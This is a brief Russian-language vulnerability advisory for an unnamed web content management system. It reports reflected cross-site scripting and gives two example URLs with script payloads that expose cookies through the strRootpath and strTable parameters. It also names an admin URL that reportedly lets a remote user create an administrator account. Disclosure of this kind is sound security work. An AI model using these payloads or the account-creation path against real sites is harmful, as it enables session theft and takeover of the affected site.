Программа: web content management 

Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и создать административную учетную запись в приложении.

1. Межсайтовый скриптинг возможен из-за недостаточной проверки входных данных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. 

Примеры: 

http://[target]/[path]/Includes/validsession.php?strRootpath= ‘);}//%20—></script><script>a lert(document.cookie)</script>

http://[target]/[path]/Admin/News/List.php?strTable=<script> alert(document.cookie)</script><!—

2. Удаленный пользователь может с помощью специально сформированного URL создать учетную запись администратора. 

Пример:

http://[target]/[path]/Admin/Users/AddModifyInput.php



Оставить мнение